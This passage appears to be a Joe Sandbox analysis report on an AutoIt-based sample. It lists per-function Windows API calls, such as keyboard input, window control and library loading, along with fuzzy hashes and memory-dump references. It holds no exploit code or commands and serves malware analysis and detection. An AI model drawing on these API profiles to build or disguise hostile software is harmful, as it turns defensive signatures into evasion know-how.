Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 75e5b7e0d27a5bfba744930282da014b401a681021e09ecc319a87868bd339ec
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 3C31C075A0010A9BC718CF59D4C0A6AFBE6FB49310B2486F9E80ACB656D731EDC1CBC0

Function 00BB4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BB4EDD,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E9C
Part of subcall function 00BB4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB4EAE
Part of subcall function 00BB4E90: FreeLibrary.KERNEL32(00000000,?,?,00BB4EDD,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4EFD

Part of subcall function 00BB4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF3CDE,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E62
Part of subcall function 00BB4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB4E74
Part of subcall function 00BB4E59: FreeLibrary.KERNEL32(00000000,?,?,00BF3CDE,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4E87

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 06bc8a698479c42af5085bf8ce9fe0e5782571d793ccce3bd7e48aa06d98b124
Instruction ID: 0bde90bc7ff6f853a3e97595b19f3b7b12d0c3fa966095478ac048f033d21567
Opcode Fuzzy Hash: 06bc8a698479c42af5085bf8ce9fe0e5782571d793ccce3bd7e48aa06d98b124
Instruction Fuzzy Hash: 1A11BF32600205ABCB24AB64DC42BFD77E5FF40B10F108469F546AB1D2EFB0EA459B50

Function 00BE8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00BE8440

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 1d7f3c2b2817566194958a733080d6627c8200e0bc65305a8ca0ee4d82f437f6
Instruction ID: e6a51e245b05747e673344f527ea0d6be8b200dc543527365f039b339af7711f
Opcode Fuzzy Hash: 1d7f3c2b2817566194958a733080d6627c8200e0bc65305a8ca0ee4d82f437f6
Instruction Fuzzy Hash: 06112A7590410AAFCF05DF59E941AAE7BF5EF48314F104099FC08AB352DB31DA15CBA5

Function 00BE5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00BE4C7D: RtlAllocateHeap.NTDLL(00000008,00BB1129,00000000,?,00BE2E29,00000001,00000364,?,?,?,00BDF2DE,00BE3863,00C81444,?,00BCFDF5,?), ref: 00BE4CBE

_free.LIBCMT ref: 00BE506C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 16beea4e5cba540c04e5f2da46fbebce1577a98bfb1923b619a51b5f39e434a2
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: C50126722047486BE3318F669885A5AFBECFB89370F25066DF184832C1EB70A805C6B4

Function 00BDE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 90fa97f529317bf4cbe0ea1965f389bf47151502aa641e5030cd582e17893e8d
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: C8F0F432510A149AC6313A6A9C05B5AB7DCDF53334F1007EBF4359A3D2EB74E80286A5

Function 00BE4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00BB1129,00000000,?,00BE2E29,00000001,00000364,?,?,?,00BDF2DE,00BE3863,00C81444,?,00BCFDF5,?), ref: 00BE4CBE

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ee1ba7183f64e21b5060412e9cc7f21b2463629612850ea1056785af7409c28e
Instruction ID: 2007fcd3d04adf9a42ca67fdf9062bf66a696ca62633608dc3260f30d4fa44a2
Opcode Fuzzy Hash: ee1ba7183f64e21b5060412e9cc7f21b2463629612850ea1056785af7409c28e
Instruction Fuzzy Hash: 6BF0E2316072A4A7DB215F639C09B5B77C8FF817A0B3841A2BC1AAB790DB70D80186E0

Function 00BE3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6,?,00BB1129), ref: 00BE3852

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c9fc1510641bc0c859a7ca71a6e019a22d20a9bc967bca1c66c8cffcb9bcfcd2
Instruction ID: 27791fe13d994061070994c1b50937b86000a53e82d4cea47252b9d47367acf8
Opcode Fuzzy Hash: c9fc1510641bc0c859a7ca71a6e019a22d20a9bc967bca1c66c8cffcb9bcfcd2
Instruction Fuzzy Hash: F1E0E5311012A4A7D63126679C09B9A77C8EB82FB0F0501A2BC0593590EB20DD0183E4

Function 00BB4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00C81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BB4F6D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 530d7461b65ffbcde6e10123f0666879717f69fd35d491b3a6f34d413a2c80b9
Instruction ID: f05e55a71247dc3eb9114b3ba1acc8bc147bc289d2ad5efb84a9bc5120865dcd
Opcode Fuzzy Hash: 530d7461b65ffbcde6e10123f0666879717f69fd35d491b3a6f34d413a2c80b9
Instruction Fuzzy Hash: EEF01571505752CFDB349F64D4909B6BBE4FF1432932089AEE1EE83622C7B19844DF10

Function 00BB2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BB2DC4

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: e99bf3bb6f886a0873a73402ed0bb63da4450ab69ebd6f73f72d075a8a5c47c4
Instruction ID: f97febe97fba816bf6dfa948c5c4f4cbd8a617630c5d5f1269337adf37bbbc33
Opcode Fuzzy Hash: e99bf3bb6f886a0873a73402ed0bb63da4450ab69ebd6f73f72d075a8a5c47c4
Instruction Fuzzy Hash: 60E0CD766011245BC7209258DC06FEA77EDDFC8790F0400B1FE09D7258D9A4AD848550

Function 00C22693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00C226B5

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: 5bed1031e0043404aa309bfca2045065ecf3c5e1b1cb7c3fc52fdf9fb4883506
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 50E04FB1609B105FDF396E28A8517B6B7E89F49300F00086EF6AB82752E57268458A4D

Function 00BB2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BB3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB3908

Part of subcall function 00BBD730: GetInputState.USER32 ref: 00BBD807

SetCurrentDirectoryW.KERNEL32(?), ref: 00BB2B6B

Part of subcall function 00BB30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00BB314E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 94fc7e498235fc80e56fbe4e4feeaf9095ad6847e8e69204f113223ec276d7bb
Instruction ID: a160c843d4402ef8ebbcaaca50b49797f61c585d8a58d25215c30119fb9ac16d
Opcode Fuzzy Hash: 94fc7e498235fc80e56fbe4e4feeaf9095ad6847e8e69204f113223ec276d7bb
Instruction Fuzzy Hash: ADE0862130424407CA04BB759852BFDA7D99BD1755F4415BEF54243163DEA589464352

Function 00BF039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00BF0704,?,?,00000000,?,00BF0704,00000000,0000000C), ref: 00BF03B7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f3d15a855fbe583d549d94eb9ac012e34debfbf0f4c85f6052ce82a02135d60e
Instruction ID: bc4c99680e6d3cac7b6514d30b1e90f985a0198920faea333200707769de90bb
Opcode Fuzzy Hash: f3d15a855fbe583d549d94eb9ac012e34debfbf0f4c85f6052ce82a02135d60e
Instruction Fuzzy Hash: 5BD06C3204010DBBDF028F84DD46EDE3BAAFB48714F014000BE1856020C732E821AB90

Function 00BB1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00BB1CBC

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 2a29f85561cfe407c0aad83775d1f628030cb75e15e61196480593fc9164d1c6
Instruction ID: 67716889e1e81f9728942d338234d387d356241ac300222d5dc6b7f29ba84c24
Opcode Fuzzy Hash: 2a29f85561cfe407c0aad83775d1f628030cb75e15e61196480593fc9164d1c6
Instruction Fuzzy Hash: DFC04C352802049AE2144B80BC4AF587754A348B00F044001F609555F382A12410A754

Function 00FB0C90 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00FB0CA1

Memory Dump Source

Source File: 00000001.00000002.1306941881.0000000000FAE000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FAE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fae000_6mllsKaB2q.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 1ea8865c8d65004baeffec9f652e171e8bcc5ea5792fd7dd0e75fb20d5cc31e4
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: FFE0E67494020DDFDB00EFB4D6496DE7FB4EF04301F100265FD01D2281DB309D509A62

Non-executed Functions

Function 00C49576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BC9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C4961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00C4969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C496C9
SendMessageW.USER32 ref: 00C496F2
GetKeyState.USER32(00000011), ref: 00C4978B
GetKeyState.USER32(00000009), ref: 00C49798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C497AE
GetKeyState.USER32(00000010), ref: 00C497B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C497E9
SendMessageW.USER32 ref: 00C49810
SendMessageW.USER32(?,00001030,?,00C47E95), ref: 00C49918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C4992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C49941
SetCapture.USER32(?), ref: 00C4994A
ClientToScreen.USER32(?,?), ref: 00C499AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C499BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C499D6
ReleaseCapture.USER32 ref: 00C499E1
GetCursorPos.USER32(?), ref: 00C49A19
ScreenToClient.USER32(?,?), ref: 00C49A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C49A80
SendMessageW.USER32 ref: 00C49AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C49AEB
SendMessageW.USER32 ref: 00C49B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C49B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C49B4A
GetCursorPos.USER32(?), ref: 00C49B68
ScreenToClient.USER32(?,?), ref: 00C49B75
GetParent.USER32(?), ref: 00C49B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00C49BFA
SendMessageW.USER32 ref: 00C49C2B
ClientToScreen.USER32(?,?), ref: 00C49C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C49CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00C49CDE
SendMessageW.USER32 ref: 00C49D01
ClientToScreen.USER32(?,?), ref: 00C49D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C49D82

Part of subcall function 00BC9944: GetWindowLongW.USER32(?,000000EB), ref: 00BC9952

GetWindowLongW.USER32(?,000000F0), ref: 00C49E05

Strings

F, xrefs: 00C49D07
@GUI_DRAGID, xrefs: 00C4997D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: cf7e9d3dd1ac7340767ce7122804712019fc7a5f5890dc4ed5393b05338a5af1
Instruction ID: e8e12c7456804b518f27d467420170db3f71a08b87ea073e7c9d4136e9fe3f85
Opcode Fuzzy Hash: cf7e9d3dd1ac7340767ce7122804712019fc7a5f5890dc4ed5393b05338a5af1
Instruction Fuzzy Hash: FF427734604611AFDB20CF28C884FABBBF9FF49320F154659FAA9872A1D731A951CF51

Function 00C44873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00C448F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00C44908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00C44927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00C4494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00C4495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00C4497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00C449AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00C449D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00C44A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C44A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00C44A7E
IsMenu.USER32(?), ref: 00C44A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C44AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C44B20
GetWindowLongW.USER32(?,000000F0), ref: 00C44B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00C44BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00C44C82
wsprintfW.USER32 ref: 00C44CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C44CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00C44CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C44D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C44D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00C44D5A

Strings

%d/%02d/%02d, xrefs: 00C44CA8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: e03f6fe3391fc495d1fce0c4207e763dc7472a3e1a7c2d9457b4ace91461adc3
Instruction ID: 9e3dc55b6d868b8dde43cdf318a5dc3b886e7166a48b535d1a6dce9120110622
Opcode Fuzzy Hash: e03f6fe3391fc495d1fce0c4207e763dc7472a3e1a7c2d9457b4ace91461adc3
Instruction Fuzzy Hash: 4412F271A00215ABEB288F65CC49FAE7BF8FF45710F204169F926DB2E1DB749A41CB50

Function 00BCF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00BCF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C0F474
IsIconic.USER32(00000000), ref: 00C0F47D
ShowWindow.USER32(00000000,00000009), ref: 00C0F48A
SetForegroundWindow.USER32(00000000), ref: 00C0F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C0F4AA
GetCurrentThreadId.KERNEL32 ref: 00C0F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C0F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00C0F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C0F4DE
SetForegroundWindow.USER32(00000000), ref: 00C0F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C0F4F6
keybd_event.USER32(00000012,00000000), ref: 00C0F501
